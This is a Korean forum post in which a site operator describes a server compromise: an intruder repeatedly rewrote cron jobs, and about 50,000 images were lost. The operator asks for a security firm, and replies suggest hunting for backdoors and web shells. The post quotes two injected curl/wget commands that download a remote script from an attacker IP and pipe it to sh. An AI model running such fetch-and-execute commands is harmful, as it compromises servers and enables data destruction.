서버 보안 업체
본문
다름이 아니고
몇일전 인도ip로 추정되는 곳에서 서버에 접속하여 cron 명령어를 바꿉니다
curl -fsSl http://xxx.xxx.xx.xxx.8443/i.sh | sh
wget -q -O- -fsSl http://xxx.xxx.xx.xxx.8443/i.sh | sh
아마도 curl로 데이터를 주고받고 하는것 같네요
저희 사이트가 이미지 컨텐츠가 많은 사이트여서
이미지가 계속 날라가네요
(5만개정도 날라갔네요)
이 과정에서 보안한다고 iptable로 ip차단하고 방화벽 설치하고 포트번호도 바꾸고
비밀번호도 바꿨는데
오늘 또 접속하여 cron 명령어를 바꾸어 놨더군요.. 이번엔 cron디렉토리도 바꿨네요 ..
이럴땐 어떻게 대응해야 할까요? 서버호스팅에 연락해봤는데 자기네도 확인할 수가 없어
보안업체에 연락을 취해보라하는데 .. 혹시 믿을만함 서버 보안 업체가 있을까요?
도움 부탁드리겠습니다
서버 보안 업체 괜찮을 곳 추천좀 부탁드리겠습니다
답변 3
백도어 파일이 업로드가 된 것이 아닌가 싶습니다.
처음 cron 명령이 실행된 시점 쯤 업로드가 된 파일 중에서 의심가는 파일을 한 번 확인해보시고, 의심가는 php파일이 있는지도 확인해보시기 바랍니다.
사실 한 번 백도어 파일을 심었다는 것은, 이게 하나가 아닐 가능성도 매우 높고, 이미 어딘가에서 보안상의 펑크가 났다는 것인지라 말씀하신대로 전문 보안 기업이 아니라면 해결하기 힘들 것 같네요.
우선 임시 조치로라도 강제로 연결되는 사이트의 host를 변경하셔서 데이터 유실을 조금이나마 막으시는게 좋을 것 같습니다.
KISA 쪽에서 중소기업 상대로 웹 취약점 점검을 해주는 것으로 알고 있습니다.
https://www.krcert.or.kr/webprotect/webVulnerability.do
한번 받아보시는것을 추천드립니다.
서버에 쉘 업로드 된거 아니에요? 웹쉘 있는지 확인도 해보시는 게..
비밀번호를 바꿨는데도 계속 들어온다는 것은, 로그인 해서 들어오는 것 같지는 않습니다.
서버에 심겨져 있는 어떤 악성 코드가 계속 동작하는 것은 아닌지요?